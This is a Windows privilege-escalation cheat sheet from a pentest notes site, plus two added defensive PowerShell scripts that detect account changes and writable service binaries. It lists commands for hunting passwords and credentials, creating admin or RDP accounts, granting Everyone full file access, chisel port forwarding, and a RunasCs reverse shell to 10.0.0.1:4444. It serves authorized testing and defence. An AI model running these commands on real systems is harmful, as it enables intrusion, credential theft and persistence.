# Windows Privilege Escalation

### [Automation](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#automation) <a href="#automation" id="automation"></a>

The following automation tools can help find privilege-escalation vectors on a target Windows machine:

* [WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)
* [wesng (Windows Exploit Suggester Next Generation)](https://github.com/bitsadmin/wesng)

<br>

### [LOLBAS (Living Off the Land Binaries, Scripts and Libraries)](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#lolbas-\(living-off-the-land-binaries%2C-scripts-and-libraries\)) <a href="#lolbas-living-off-the-land-binaries-2c-scripts-and-libraries" id="lolbas-living-off-the-land-binaries-2c-scripts-and-libraries"></a>

[LOLBAS](https://lolbas-project.github.io/) catalogues ways to misuse tools and executables that already exist on a Windows system, so check that website.

<br>

### [OS Information](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#os-information) <a href="#os-information" id="os-information"></a>

```powershell
hostname
systeminfo
systeminfo | findstr "OS"
ver
[System.Environment]::OSVersion.Version

# Datetime
Get-Date
```

### [Interesting Information](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#interesting-information) <a href="#interesting-information" id="interesting-information"></a>

```powershell
# Current user
whoami
whoami /user
whoami /groups
whoami /priv
whoami /all
echo %username%

# List users
net user
net users
net user USERNAME
Get-LocalUser

# List groups
net group
net localgroup
# List users in specific group
net localgroup "Remote Management Users"

# List user home directories
Get-ChildItem C:\Users -Force

# Network
ipconfig
ipconfig /all
route print
arp -a
Get-NetAdapter

# Firewall
netsh firewall show state
netsh firewall show config
netsh advfirewall show allprofiles
```

#### [Find OS Vulnerabilities](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#find-os-vulnerabilities) <a href="#find-os-vulnerabilities" id="find-os-vulnerabilities"></a>

After collecting the OS information, look up known vulnerabilities for that OS version and patch level (for example with wesng from the Automation section).

<br>

### [Recent Files](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#recent-files) <a href="#recent-files" id="recent-files"></a>

1. Right-click on the Windows icon.
2. Click **Run**.
3. Type `recent` in the search form.

<br>

### [Running Services](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#running-services) <a href="#running-services" id="running-services"></a>

These checks mainly use **the Windows Management Instrumentation command-line (WMIC)**.

```powershell
wmic service list
wmic service list | findstr "Backup"

# Get target process info
wmic process get processid,parentprocessid,executablepath | find "<process-id>"
# Get users SID
wmic useraccount get name,sid
# Launch the hidden executable hiding within ADS
wmic process call create $(Resolve-Path .\file.exe:streamname)

# Processes and services
sc query state=all
tasklist /svc

# Query the configuration info for a specified service
sc qc "Development Service"
```

<br>

### [Histories](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#histories) <a href="#histories" id="histories"></a>

#### [Command History in PowerShell Console](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#command-history-in-powershell-console) <a href="#command-history-in-powershell-console" id="command-history-in-powershell-console"></a>

```powershell
type c:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

#### [Web Browser Histories](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#web-browser-hidsotries) <a href="#web-browser-hidsotries" id="web-browser-hidsotries"></a>

We might find interesting information about users by checking the browsing history of web browsers such as **Chrome**, **Microsoft Edge**, **Internet Explorer**, etc.

<br>

### [VSS (Volume Shadow Copy Service)](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#vss-\(volume-shadow-copy-service\)) <a href="#vss-volume-shadow-copy-service" id="vss-volume-shadow-copy-service"></a>

VSS coordinates the actions required to create a consistent shadow copy (also known as a snapshot or a point-in-time copy) of the data that is to be backed up.

```powershell
vssadmin
vssadmin list shadows
vssadmin list volumes
```

<br>

### [Registry Keys](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#registry-keys) <a href="#registry-keys" id="registry-keys"></a>

We may be able to retrieve sensitive information in registry hives.\
See also: [Windows PrivEsc with Registry Keys](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/windows-privesc-with-registry-keys)

```powershell
# List all subkeys of a registry key
Get-ChildItem -Path HKCU:\ | Select-Object Name
# -Recurse: List recursively
Get-ChildItem -Path HKCU:\System -Recurse | Select-Object Name

# Search sensitive information in HKLM (HKEY_LOCAL_MACHINE)
# /f password: Specifies the keyword 'password' to search.
# /t REG_SZ: Specifies REG_SZ (string) type to search.
# /s: Specifies to query all subkeys and value names recursively.
reg query HKLM /f password /t REG_SZ /s
```

<br>

### [Running Processes](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#running-processes) <a href="#running-processes" id="running-processes"></a>

```powershell
# -a: All connections and ports
# -f: Display FQDN (Fully Qualified Domain Names)
# -o: Display the owning process ID associated with each connection
netstat -afo

Get-Process
# Exclude `svchost`
Get-Process | where {$_.ProcessName -notlike "svchost*"}
```

<br>

### [Sensitive Information](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#sensitive-information) <a href="#sensitive-information" id="sensitive-information"></a>

```powershell
# /s: Searches the current directory and all subdirectories.
# /i: Ignores the case of the characters.
findstr /si password *.txt *.xml *.ini
findstr /si password c:\Users\Administrator\*.txt
findstr /si cred *.txt *.xml *.ini
findstr /si cred c:\Users\Administrator\*.txt

# /p: Skips files with non-printable characters.
# /n: Prints the line number of each line that matches.
findstr /spin "password" *.*
findstr /spin "password" c:\Users\Administrator\*

# List files
# /a: Displays files with the specified attributes (with no attribute list, hidden and system files are included).
dir /a \Users\Administrator\Desktop
# /s: Lists every occurrence of the specified file name within the specified directory and all subdirectories.
dir /s *pass* == *cred* == *vnc* == *.config*
# /q: Displays the ownership information.
dir /q \Users\Administrator\Desktop

# Website folder
dir c:\inetpub\

# SQL server
dir c:\SQLServer\Logs
type c:\SQLServer\Logs\ERRORLOG.BAK

# Get contents of file
more .\example.txt
type .\example.txt

# Check $Recycle.Bin and the per-user SID folders inside it
dir -Force '\$Recycle.Bin'

# ManageEngine (this product has had many vulnerabilities)
dir -Force '\Program Files (x86)\ManageEngine\'
```

#### [Find Interesting Files](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#find-interesting-files) <a href="#find-interesting-files" id="find-interesting-files"></a>

```powershell
Get-ChildItem -Path C:\ -Filter "*.txt" -Recurse 2>$null
# Directories
Get-ChildItem -Path C:\ -Directory -Filter "Example" -Recurse 2>$null
```

#### [Collect Emails](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#collect-emails) <a href="#collect-emails" id="collect-emails"></a>

Reference: [Atomic Red Team](https://atomicredteam.io/collection/T1114.001/)

Email data such as **Outlook** mailbox files may be found in the following directories.

```powershell
C:\Users\<username>\Documents\Outlook Files
C:\Users\<username>\AppData\Local\Microsoft\Outlook
```

<br>

### [Open Ports](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#open-ports) <a href="#open-ports" id="open-ports"></a>

```powershell
netstat -a
```

If we find listening ports that are bound only locally, we need port forwarding to reach them from our local machine.\
For example, assume port 8000 is listening on the target. After running the following commands, we can reach it at `http://localhost:8000` on the local machine.

```bash
# Remote (target) machine
chisel.exe client 10.0.0.1:9999 R:8000:127.0.0.1:8000

# Local (attacker) machine
chisel server --reverse -p 9999
```

Please refer to [this page](https://exploit-notes.hdks.org/exploit/network/port-forwarding/port-forwarding-with-chisel) to check how to use Chisel for port forwarding.

<br>

### [Getting All Local Users/Groups](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#getting-all-local-users%2Fgroups) <a href="#getting-all-local-users-2fgroups" id="getting-all-local-users-2fgroups"></a>

We can find all local users in the **Computer Management** utility. To open it, enter **"computer management"** in the search box at the bottom of the Windows screen.

In Computer Management, click **"Local Users and Groups"**.

#### [Enumerate Users](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#enumerate-users) <a href="#enumerate-users" id="enumerate-users"></a>

1. Click **"Users"**.
2. Double-click each user to get details e.g. **"Member Of"**.

#### [Enumerate Groups](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#enumerate-groups) <a href="#enumerate-groups" id="enumerate-groups"></a>

1. Click **"Groups"**.
2. Double-click each group.
3. Attempt to add a new user to the group; this may succeed even if we are not an administrator.

<br>

### [Change File Permission](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#change-file-permission) <a href="#change-file-permission" id="change-file-permission"></a>

1. Right-click on the file.
2. Select the **Properties**.
3. Click the **Security** tab.
4. Click **“Advanced”**.
5. In the **Permissions** tab, click the **“Add”**.
6. Click **“Select a principal”**.
7. Enter the username in the text field.
8. Click **OK** and **Apply**.

We can also change permissions from the Command Prompt or PowerShell.

```powershell
icacls 'C:\Path\to\file' /grant Users:F
icacls 'C:\Path\to\file' /grant Everyone:F
```

<br>

### [Change User/Group Permission](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#change-user%2Fgroup-permission) <a href="#change-user-2fgroup-permission" id="change-user-2fgroup-permission"></a>

```powershell
# Change user's password
net user USERNAME NEWPASSWORD

# Add new user
net user /add USERNAME PASSWORD

# Add user to group
net localgroup Administrators USERNAME /add
net localgroup "Remote Management Users" USERNAME /add   # For WinRM
net localgroup "Remote Desktop Users" USERNAME /add     # For RDP

# Delete users from specific group
net localgroup "Remote Management Users" USERNAME /delete
```

Once the membership change succeeds, connect to the target via **WinRM** or **RDP**.
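Every one of the `net user` and `net localgroup` commands above leaves a trace in the Security event log, which is how a defender notices them. The script below is an added example, not part of the original page: it pulls the Microsoft-documented account-management events (4720 user created, 4724 password reset, 4732/4733 member added to or removed from a local group), flattens their event data, and flags changes to the groups that grant admin, WinRM or RDP access. It assumes the "Audit User Account Management" and "Audit Security Group Management" policies are enabled, that the caller can read the Security log (local administrator or the Event Log Readers group), and English group names; the function and variable names are mine.

```powershell
# Added example (not from the original page): list recent local account and
# group-membership changes from the Security log and flag the sensitive ones.

$eventNames = @{
    4720 = 'User account created'
    4724 = 'Password reset attempted'
    4732 = 'Member added to local group'
    4733 = 'Member removed from local group'
}
# Groups whose membership grants administrative or remote access (English names assumed).
$sensitiveGroups = @('Administrators', 'Remote Management Users', 'Remote Desktop Users')

function ConvertTo-EventDataTable {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    # Flatten <EventData><Data Name="x">value</Data>... into a hashtable keyed by Name.
    $xml  = [xml]$Event.ToXml()
    $data = @{}
    foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }
    return $data
}

function Resolve-Sid {
    param([string]$Sid)
    # Group-membership events carry the member as a SID; translate it when possible.
    try {
        return ([System.Security.Principal.SecurityIdentifier]$Sid).Translate(
            [System.Security.Principal.NTAccount]).Value
    } catch { return $Sid }
}

function Get-LocalAccountChanges {
    param([int]$Hours = 24)
    $filter = @{
        LogName   = 'Security'
        Id        = @($eventNames.Keys)
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    # -ErrorAction SilentlyContinue: Get-WinEvent throws when no event matches.
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $d            = ConvertTo-EventDataTable $_
        $isGroupEvent = @(4732, 4733) -contains $_.Id
        # For group events TargetUserName is the group and MemberSid the account;
        # for account events TargetUserName is the account itself.
        $group  = if ($isGroupEvent) { $d['TargetUserName'] } else { $null }
        $target = if ($isGroupEvent) { Resolve-Sid $d['MemberSid'] } else { $d['TargetUserName'] }
        [PSCustomObject]@{
            Time      = $_.TimeCreated
            Id        = $_.Id
            Action    = $eventNames[[int]$_.Id]
            Actor     = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
            Target    = $target
            Group     = $group
            Sensitive = [bool]($group -and ($sensitiveGroups -contains $group))
        }
    }
}

# Show the last day of changes, sensitive-group changes first, newest first.
Get-LocalAccountChanges -Hours 24 | Sort-Object Sensitive, Time -Descending | Format-Table -AutoSize
```

The `Actor` column is the subject that performed the change, which is the detail worth alerting on: a member added to `Remote Management Users` by an account that is not a known administrator is the footprint of exactly the sequence this section describes.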

<br>

### [Take Ownership of a File (Administrators Group Required)](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#take-ownership-of-a-file-\(administrators-group-required\)) <a href="#take-ownership-of-a-file-administrators-group-required" id="take-ownership-of-a-file-administrators-group-required"></a>

```powershell
# Check if the current user belongs to the Administrators group. 
net user USERNAME

# Move to the directory containing the desired file
cd \Users\Administrator\Desktop

# Enable an administrator to recover access to a file.
# /R: recursive operation
# /F: specify the filename
takeown /r /f *.*

# Modify discretionary access control lists (DACLs) on the specified files
# /q: suppress success message
# /c: continue the operation despite any file errors
# /t: perform the operation on all specified files
# /grant: grant specified user access rights
icacls "example.txt" /q /c /t /grant Users:F
```
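The `icacls ... /grant Users:F` and `Everyone:F` commands in this and the "Change File Permission" section produce exactly the misconfiguration that turns a service into a privilege-escalation path: a binary that runs as `LocalSystem` but that any local user may overwrite. The script below is an added example, not part of the original page; it audits every installed service, resolves the binary from the service command line, and reports binaries whose DACL grants write-class rights to a low-privileged principal. It assumes English principal names (`BUILTIN\Users`, `Everyone`, `NT AUTHORITY\Authenticated Users`, `NT AUTHORITY\INTERACTIVE`), and the function names are mine. It needs no elevation for binaries whose DACL an ordinary user can read.

```powershell
# Added example (not from the original page): find service binaries that
# low-privileged principals can modify, i.e. the result of "icacls ... /grant Users:F".

$weakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a principal change or replace the file: the named FileSystemRights
# write bits plus the GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) access
# masks, which Get-Acl reports as raw numbers rather than enum names.
$fsr = [System.Security.AccessControl.FileSystemRights]
$writeMask = [int]($fsr::Write -bor $fsr::Modify -bor $fsr::FullControl) -bor 0x40000000 -bor 0x10000000

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Service command lines look like "C:\Program Files\App\svc.exe" -arg,
    # C:\Windows\system32\svchost.exe -k netsvcs, or %SystemRoot%\... with env vars.
    $expanded = [Environment]::ExpandEnvironmentVariables($PathName)
    if ($expanded -match '^"([^"]+)"')        { return $Matches[1] }
    if ($expanded -match '^(.+?\.exe)(\s|$)') { return $Matches[1] }
    return $null
}

function Get-WeakAce {
    param([string]$Path)
    # Returns the first Allow ACE granting write-class rights to a weak principal, else $null.
    $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($weakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -ne 0) { return $ace }
    }
    return $null
}

function Find-WritableServiceBinaries {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $bin = Get-ServiceBinaryPath $_.PathName
        if (-not $bin -or -not (Test-Path -LiteralPath $bin -PathType Leaf)) { return }
        try { $ace = Get-WeakAce $bin } catch { return }   # DACL not readable: skip
        if ($ace) {
            [PSCustomObject]@{
                Service   = $_.Name
                RunsAs    = $_.StartName      # LocalSystem here is the high-impact case
                StartMode = $_.StartMode
                Binary    = $bin
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

Find-WritableServiceBinaries | Format-Table -AutoSize
```

A finding with `RunsAs = LocalSystem` and `Principal = BUILTIN\Users` is the one to fix first; the remediation is to remove the write ACE (`icacls <binary> /remove:g Users`) and restore the vendor's ACL rather than to rely on the service account being obscure.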

<br>

### [Switch Another User](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#switch-another-user) <a href="#switch-another-user" id="switch-another-user"></a>

```powershell
runas /user:<domain>\<username> cmd
runas /user:<username> explorer.exe
```

#### [Spawn Another Session as Another User](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#spawn-another-session-as-another-user) <a href="#spawn-another-session-as-another-user" id="spawn-another-session-as-another-user"></a>

If we cannot switch user, for example from a reverse shell session, we can spawn another shell as another user with [RunasCS](https://github.com/antonioCoco/RunasCs).

First, start a listener on the local machine.

```bash
nc -lvnp 4444
```

Then execute the following command on the target machine.\
Replace **`username`** and **`password`** with the credentials of the user we want to switch to.

```powershell
RunasCs.exe username password cmd -r 10.0.0.1:4444
```

<br>

### [All Privs for Local Service, Network Service Account](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#all-privs-for-local-service%2C-network-service-account) <a href="#all-privs-for-local-service-2c-network-service-account" id="all-privs-for-local-service-2c-network-service-account"></a>

If we are running as the `Local Service` or `Network Service` account, it may be possible to grant all privileges to the account.

[FullPowers](https://github.com/itm4n/FullPowers) is a powerful tool for doing that.

```powershell
FullPowers.exe

# Confirm whether the account now has all privileges
whoami /priv
```

<br>

### [Event Logs](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#event-logs) <a href="#event-logs" id="event-logs"></a>

* **Event Viewer**
* **FullEventLogView**

<br>

### [Tasks](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#tasks) <a href="#tasks" id="tasks"></a>

* **Task Scheduler**

<br>

### [Sysinternals](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/#sysinternals) <a href="#sysinternals" id="sysinternals"></a>

Tools that offer technical resources and utilities to manage, diagnose, troubleshoot, and monitor a Microsoft Windows environment.

```powershell
# Autoruns
# It shows what programs are configured to run during system bootup or login.
autoruns.exe

# Process Explorer
# A freeware task manager and system monitor.
procexp.exe
procexp64.exe

# Process Monitor
# It monitors and displays in real-time all file system activity.
procmon.exe
procmon64.exe

# Strings
# Same as the Linux "strings" command.
strings.exe example.exe | findstr "sometext"
strings64.exe example.exe | findstr "sometext"
```

### References

* <https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation>
* <https://learn.microsoft.com/en-us/powershell/scripting/samples/working-with-registry-keys?view=powershell-7.3>

